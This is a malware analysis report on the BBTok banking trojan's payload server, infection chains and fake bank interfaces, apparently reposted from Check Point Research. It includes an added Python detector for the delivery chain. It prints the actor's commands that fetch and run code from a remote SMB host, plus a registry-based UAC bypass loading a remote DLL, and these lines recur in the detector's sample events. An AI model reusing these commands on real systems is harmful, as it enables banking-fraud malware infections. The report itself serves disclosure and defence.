BEHIND THE SCENES OF BBTOK: ANALYZING A BANKER’S SERVER SIDE COMPONENTS


Introduction

Check Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker in Latin America. In this research, we highlight newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins), resulting in low detection rates even though the BBTok banker has been operating since at least 2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks, which target hundreds of users in Brazil and Mexico.

The server-side components are responsible for serving malicious payloads that are likely distributed through phishing links. We observed numerous iterations of the same server-side scripts and configuration files, which demonstrate the evolution of the BBTok banker’s deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet put to use, and to trace the origins of the source code employed to sustain such operations.

In this report, we highlight some of the server-side functionality of the payload server used to distribute the banker. It generates a unique payload for each victim at the moment the link is clicked.

Key Findings

  1. BBTok remains active, targeting users in Brazil and Mexico and employing multi-layered geo-fencing to ensure that infected machines are from those countries only.
  2. Since the last public reporting on BBTok in 2020, the operators’ techniques, tactics and procedures (TTPs) have evolved significantly, adding further layers of obfuscation and downloaders, which results in low detection rates.
  3. The BBTok banker has dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks and tricks victims into entering the 2FA code for their bank accounts or their payment card number.
  4. The newly identified payloads are generated by a custom server-side application that produces a unique payload for each victim based on operating system and location.
  5. Analysis of the payload server-side code revealed that the actors are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL.
  6. The threat actors add open-source code, code from hacking forums, and new exploits as they appear (e.g. Follina) to their arsenal.

Background

The BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set of functionalities, including enumerating and killing processes, keyboard and mouse control, and manipulating clipboard contents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages for a wide variety of banks operating in Mexico and Brazil.

Since it was first publicly disclosed, the BBTok operators have adopted new TTPs, while still primarily using phishing emails with attachments for the initial infection. Recently we have seen indications of the banker being distributed through phishing links rather than as attachments to the email itself.

Upon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machine. It contains an LNK file that kicks off the infection chain, leading to the deployment of the banker while a decoy document is opened. Although the process appears quite straightforward at first glance, we found evidence that there is a lot going on behind the scenes.

While analyzing these newly identified links, we uncovered internal server-side resources used to distribute the malware. Looking at those, it became evident that the actor maintains a much wider variety of infection chains, generated on demand with each click and tailored to the victim’s operating system and location.

BBTok Banking Hijacks

BBTok gives its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan features. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks in Mexico and Brazil, such as Citibank, Scotiabank, Banco Itaú and HSBC (see Appendix B for the full list of targeted banks). The banker looks for indications that its victims are clients of those banks by iterating over the open windows and the names of browser tabs, searching for bank names.

The default target the banker apparently aims at is BBVA, and the default fake interface replicates its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details. The focus of this functionality is tricking the victim into entering the security code / token number that serves as 2FA for the bank account, in order to take over the victim’s bank account. In some cases, this capability also aims to trick the victim into entering their payment card number.

Figure 1 – Examples of fake interfaces embedded within the BBTok Banker.

BBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these fake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer screen, with a specific form for the victim’s bank, without raising suspicion. BBVA, the default bank the banker targets, has its interface stored in one such form named “TFRMBG”. In addition to banking sites, the attackers have kept up with the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking for strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.

BBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser extension or inject a DLL named “rpp.dll” to further its hold on the infected system, likely to improve its ability to trick the victims. Those components were not available at the time of analysis.

What’s notable is the operator’s cautious approach: all banking activities are executed only upon direct command from the C2 server, and are not automatically carried out on every infected system.

Payload Server Analysis

Overview of the Payload Server

To manage their campaign effectively, the BBTok operators created a unique flow that is kicked off by the victim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, either a ZIP archive or an ISO image is downloaded, depending on the victim’s operating system. Although the process is seamless for the victim, the server generates a unique payload based on parameters found in the request.

Figure 2 – Server-side components used in BBTok infections.

This process is carried out on a XAMPP-based server and involves three essential components:

  1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure archives.
  2. A PHP codebase and database designed to document and manage infections.
  3. Auxiliary utilities that enhance the functionality of these components.

This is the chain of events:

  1. A victim performs an HTTP request to /baixar, /descargar or /descarga (these paths suggest that the lures are in either Spanish or Portuguese).
  2. Based on the .htaccess file, the server handles the request using descarga.php.
  3. The scripts use the file db.php to store information about the request, including the victim’s fingerprint, in an SQLite database.
  4. descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually delivered to the victim.

Incoming Requests Handling

The PHP codebase is composed of the following files:

  1. descarga / descargar.php – Manages new connections and serves lure documents to the victim’s PC.
  2. db.php – Generates and manages the SQLite database that holds the victims’ details.
  3. generator.php – Utility class used to generate random links, strings, and other helpers.

“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process. The script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the attackers’ origin.

The script logic:

  1. It checks the geolocation of the link-referred victim against ip-api.com and stores it in a file. If the victim isn’t from a targeted country (i.e., Mexico or Brazil), the HTTP connection ends immediately with a 404 response.

$api = new IpApi();
$whoAmI = $api->GetInfo($ip);
$allowed = array("MX", "BR");
file_put_contents("ips/".$ip.$whoAmI->countryCode, "");
if(!in_array($whoAmI->countryCode, $allowed)) {
    http_response_code(404);
    die();
}

  2. If the victim passes the check, the script then parses the User-Agent header to get the victim’s Windows OS version.

$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));
$match = false;
$dfile = "10";
$dfiles = array (
    'windows nt 10.0' => '10',
    'windows nt 6.3' => '10',
    'windows nt 6.2' => '10',
    'windows nt 6.1' => '7',
    'windows nt 6.0' => '7',
    'windows nt 5.2' => '7'
);
foreach($dfiles as $os=>$file) {
    if (preg_match('/' . $os . '/i', $useragent)) {
        $match = true;
        $dfile = $file;
        break;
    }
}

  3. It then passes the parsed OS version, together with the victim’s country code and the lure filename, to the PowerShell payload generator script.

PowerShell Payload Generator

The script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest version of the code has many commented-out sections that were likely functional in the past, which suggests they contain additional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating that this operation has been ongoing for quite a while.

Our analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the section “Earlier Versions”.

The generator script is called by descarga.php through the function DownloadFile with the arguments file_name, ver and cc. These correspond to the generated archive name, the victim’s OS version and the victim’s country code.

function DownloadFile($file_name, $ver, $cc) {
    if($ver == "10" )
    {
        $ext = "iso";
    } else {
        $ext = "zip";
    }
    exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);
    return $file_name.'.'.$ext;
}

The code portions used in the observed iteration of the server generate the archive payloads based on two parameters:

  1. The origin country of the victim – Brazil or Mexico.
  2. The operating system extracted from the User-Agent – Windows 10 or 7.

According to the results, the following parameters of the malicious archive are selected:

  1. Type of the archive: ISO for Windows 10; ZIP for Windows 7 and other versions.
  2. The name of the DLL file used in the next stage changes according to the targeted country: Trammy is used for Brazil, and Gammy is used for Mexico.
  3. The archive contains an LNK. The LNK’s shortcut icon is the one used by Microsoft Edge for Windows 10 and the one used by Google Chrome for Windows 7.
  4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file named dat.xml from the server 216[.]250[.]251[.]196, which also stores the malicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant remote DLL via CMD execution.

$shortcutName = $args[0]
$win = $args[1]
$country = $args[2]
$stegoKey = New-StegoKey 35
if($country -eq "BR") {
    $dllName = 'Trammy'
} else {
    $dllName = 'Gammy'
}
if($win -eq "10") {
    $wstate = 7
    $shortcutIconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    CopyMSBuild($shortcutName)
} else {
    $wstate = 7
    $shortcutIconLocation = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
}

Add-PoshObfuscation

All payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single result from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This individual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:

Figure 3 – Add-PoshObfuscation() code shared on hackforums[.]net.

Infection Chains and Final Payload

The process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for Windows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection mechanisms such as AMSI.

*ammy.dll Downloaders

Both infection chains use malicious DLLs named with a similar convention – Trammy, Gammy, Brammy, or Kammy. These are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any malicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes packed with multiple additional password-protected tools. These give the actors full access to the infected machine, plus additional functionality.

Windows 7 Infection Chain

Figure 4 – Windows 7 Infection Chain.

The infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads, extracts, and runs the BBTok payload.

Windows 10 Infection Chain

Figure 5 – Windows 10 Infection Chain.

The infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the commands in the following manner:

DANFE352023067616112\DANFE352023067616112.exe /c copy %cd%\DANFE352023067616112\DANFE352023067616112.pdf %userprofile%\DANFE352023067616112.pdf /Y & start %userprofile%\DANFE352023067616112.pdf & C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\216.250.251.196\file\dat.xml

The infection chain:

  1. Copy the lure file to the %userprofile% folder and open it.
    Figure 6 – Lure document dropped in BBTok infection.
  2. Run MSBuild.exe to build an application from an XML project file stored on a remote server, fetched over SMB.
  3. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with a renamed rundll32.exe (mmd.exe), as seen in the XML contents:

private void ByFD() {
    String reg = "/c REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d \"C:\\ProgramData\\mmd.exe \\\\216.250.251.196\\file\\Trammy.dll, Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f & REG DELETE HKCU\\Software\\Classes\\.pwn /f\" /f & REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f & timeout /t 3 >nul & start /MIN computerdefaults.exe";
    StartProcess("cmd.exe", reg);
}

  4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.

The unique combination of a renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the Windows 10 infection chains.
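Each step of the Windows 10 chain above leaves a distinct process-creation artifact, and the following added example (not Check Point’s code nor the actor’s) shows detection logic over constructed Sysmon Event ID 1-style records: a LOLBin whose on-disk name no longer matches its PE OriginalFileName, MSBuild.exe building a project from a UNC path, rundll32 loading a DLL from a remote share, and the ms-settings ProgID hijack followed by computerdefaults.exe or fodhelper.exe. The field names and the PE original names "Cmd.Exe" and "RUNDLL32.EXE" are assumed to match what Sysmon reports; the sample telemetry is constructed from the command lines quoted in the report.

```python
"""Detection logic for the BBTok Windows 10 delivery chain (added example)."""
import json
import re
from typing import Dict, List

# on-disk name -> PE OriginalFilename as Sysmon reports it (assumed values)
LOLBIN_ORIGINAL_NAMES = {"cmd.exe": "Cmd.Exe", "rundll32.exe": "RUNDLL32.EXE"}

# \\host\share\path as it appears inside a command line
UNC_PATH = re.compile(r'\\\\[\w.\-]+\\[^\s"]+')
# ProgID hijack used by the computerdefaults / fodhelper auto-elevation bypasses
MSSETTINGS_HIJACK = re.compile(
    r"Software\\Classes\\ms-settings\\(CurVer|Shell\\Open\\command)", re.IGNORECASE)
UAC_TRIGGERS = ("computerdefaults.exe", "fodhelper.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits: List[str] = []
    image = _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    orig = ev.get("OriginalFileName", "").lower()

    # 1. A LOLBin renamed on disk (the ISO ships cmd.exe as DANFE...exe and
    #    rundll32.exe as mmd.exe): PE original name no longer matches the image.
    for real, pe_name in LOLBIN_ORIGINAL_NAMES.items():
        if orig == pe_name.lower() and image != real:
            hits.append("renamed_" + real.split(".")[0])

    # 2. MSBuild.exe handed a project file on a UNC path (fetched over SMB).
    if image == "msbuild.exe" and UNC_PATH.search(cmd):
        hits.append("msbuild_unc_project")

    # 3. rundll32 (renamed or not) loading a DLL straight from a remote share.
    if orig == "rundll32.exe" and UNC_PATH.search(cmd):
        hits.append("rundll32_unc_dll")

    # 4. ms-settings ProgID hijack combined with an auto-elevating trigger binary.
    if MSSETTINGS_HIJACK.search(cmd) and any(t in cmd.lower() for t in UAC_TRIGGERS):
        hits.append("ms_settings_uac_bypass")
    return hits


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse JSON-lines telemetry and return one finding per matching event."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        ev = json.loads(line)
        rules = check_event(ev)
        if rules:
            findings.append({"line": n, "image": ev.get("Image"), "rules": rules})
    return findings


# Constructed sample telemetry modelled on the chain described in the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c dir"},
    {"Image": r"E:\DANFE352023067616112\DANFE352023067616112.exe",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"DANFE352023067616112\DANFE352023067616112.exe /c copy "
                    r"%cd%\DANFE352023067616112\DANFE352023067616112.pdf "
                    r"%userprofile%\DANFE352023067616112.pdf /Y & start "
                    r"%userprofile%\DANFE352023067616112.pdf & "
                    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "
                    r"-nologo \\216.250.251.196\file\dat.xml"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "OriginalFileName": "MSBuild.exe",
     "CommandLine": r"MSBuild.exe -nologo \\216.250.251.196\file\dat.xml"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r'cmd.exe /c REG ADD HKCU\Software\Classes\.pwn\Shell\Open\command'
                    r' -ve /d "C:\ProgramData\mmd.exe \\216.250.251.196\file\Trammy.dll,'
                    r' Dacl" /f & REG ADD HKCU\Software\Classes\ms-settings\CurVer -ve'
                    r' /d ".pwn" /f & timeout /t 3 >nul & start /MIN computerdefaults.exe'},
    {"Image": r"C:\ProgramData\mmd.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"C:\ProgramData\mmd.exe \\216.250.251.196\file\Trammy.dll, Dacl"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['image']} -> {', '.join(f['rules'])}")
```

Rule 1 fires on the two renamed binaries even when the parent is a trusted process, which is what makes the ISO-delivered chain visible before any network fetch has been observed.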

Earlier Versions

Throughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server. We saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.

Changes in the PHP Code

Looking at an earlier version of the descarga.php script, we saw a few key differences:

  1. Originally, only victims from Mexico were targeted.
  2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the script.
  3. Instead of executing the PowerShell script directly, a script named gen.php was called. We were unable to obtain this script, but believe it simply executed the PowerShell script.
  4. The victim’s IP address, user agent, and a flag (jaBaixou, or ‘already downloaded’ in Portuguese) were inserted into a database using the db.php file. The flag is later checked so that the same payload is not served twice.

As this section is not used in the latest version, it is possible that the attackers found this process cumbersome and decided to trade OPSEC for easier management and a higher chance of infection success.

Modifications of the PowerShell Script

Looking at older versions of the PowerShell script, it was clear that numerous changes were made to the payload and execution chain. Some noteworthy ones include:

  1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1.
  2. A later update added the lure PDF, fac.pdf (“fac” is an abbreviation of “factura”, which is “invoice” in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican government site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.
  3. The newest version we found opens a different legitimate site, hxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes the XML file used by MSBuild and renames the DLL reserved for Brazilian targets from Brammy.dll to Trammy.dll.

Unused Code and Infection Vectors

Certain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the primary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:

  1. ze.docx is a document that exploits Follina (CVE-2022-30190). It is referenced in the PowerShell script in a function named CreateDoc.
  2. xll.xll, which is referenced by CreateXLL, is a malicious XLL taken from the open-source project https://github.com/moohax/xllpoc, which implements code execution via Excel.
  3. Numerous empty JavaScript files were found on the server, likely meant to be used by a function named CreateJS. The file referenced in the function, b.js, was empty, so it is unclear whether this function was previously used or was never fully implemented.
  4. Multiple BAT files were located on the server, each with a different implementation of downloading the next stages. These were most likely created by a function named CreateBat, which is commented out in the latest version of the PowerShell script. Most of them are almost identical to the code in the ByFD function we analyzed previously, excluding two noteworthy past iterations:

    1. The oldest BAT file downloaded another PowerShell script as a next stage (which was no longer publicly available) instead of editing the registry;
    2. A later BAT file used the fodhelper UAC bypass instead of the computerdefaults one that is currently in use.

Victimology and Attribution

Our analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’ side, based on a database we found that documents access to the malicious application. The database is named links.sqlite and is pretty straightforward. It contains over 150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note the use of the Portuguese language in the names of the 4 columns:

  1. chave, or key;
  2. assunto, or subject;
  3. user_agent;
  4. baixou, or downloaded.

The column named chave contained the IP addresses of the victims, and the column assunto was empty:

Figure 7 – Links.sqlite database.

Figure 8 – Attack region.

As the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in Portuguese, we believe this indicates with high probability that the threat actors are Brazilian; Brazil is known for its active banking malware ecosystem.

Conclusion

Although BBTok has been able to remain under the radar due to its elusive techniques and its targeting of victims only in Mexico and Brazil, it is evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.

It is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are constantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and opportunities. To keep up and protect against future attacks, security researchers must do the same.

Check Point Protections

Check Point Threat Emulation:

  • Banker.Wins.BBTok.A
  • Banker.Win.BBTok.B
  • Technique.Wins.SuxXll.A
  • Trojan.Win.XllAddings.A

Harmony Endpoint:

  • Trojan.Win.Generic.AQ
  • Trojan.Win.Generic.AR

Appendix A – IOCs


Network Indicators

Name                                      Description
danfe[.]is-certified[.]com                Phishing Domain
rendinfo[.]shop                           Phishing Domain
sodkvsodkv[.]supplier[.]serveftp[.]net    Malicious DLL Download Domain
216[.]250[.]251[.]196                     Payload Server
173[.]249[.]196[.]195                     Payload Server
176[.]31[.]159[.]196                      Payload Server
147[.]124[.]213[.]152                     Payload Server

Appendix B – List of Targeted Banks

Banking Caixa
CCB Brasil
Banco Itaú
Mercantil do Brasil
Santander
BANCO PAULISTA
Getnet
Banco Daycoval
Sicredi
Mercado Pago
Sicoob
Nubank
Citibank Brasil
C6 Bank
Internet Banking BNB
Internet Banking Inter
Unicred Portal
Bancoob
Banco da Amazonia
BBVA
Banestes
Banorte
Banco Alfa
HSBC
Banpará
Banamex
Banese
Bajio
BRB Banknet
Scotiabank
Banco Intermedium
Afirme
Banco Topázio
Banregio
Uniprime
Azteca
Cooperativa de Crédito – CrediSIS
Multiva
Banco Original
Inbursa
Banco Fibra
CiBanco
Bradesco Despachantes e Auto Escola – Cidadetran
Sicoobnet
Navegador Exclusivo Banco do Brasil

Originally published by Check Point Research (cp<r>): BEHIND THE SCENES OF BBTOK: ANALYZING A BANKER’S SERVER SIDE COMPONENTS

Copyright notice: posted by admin on September 21, 2023 at 9:15 AM.
Please credit when reposting: BEHIND THE SCENES OF BBTOK: ANALYZING A BANKER’S SERVER SIDE COMPONENTS | CTF导航
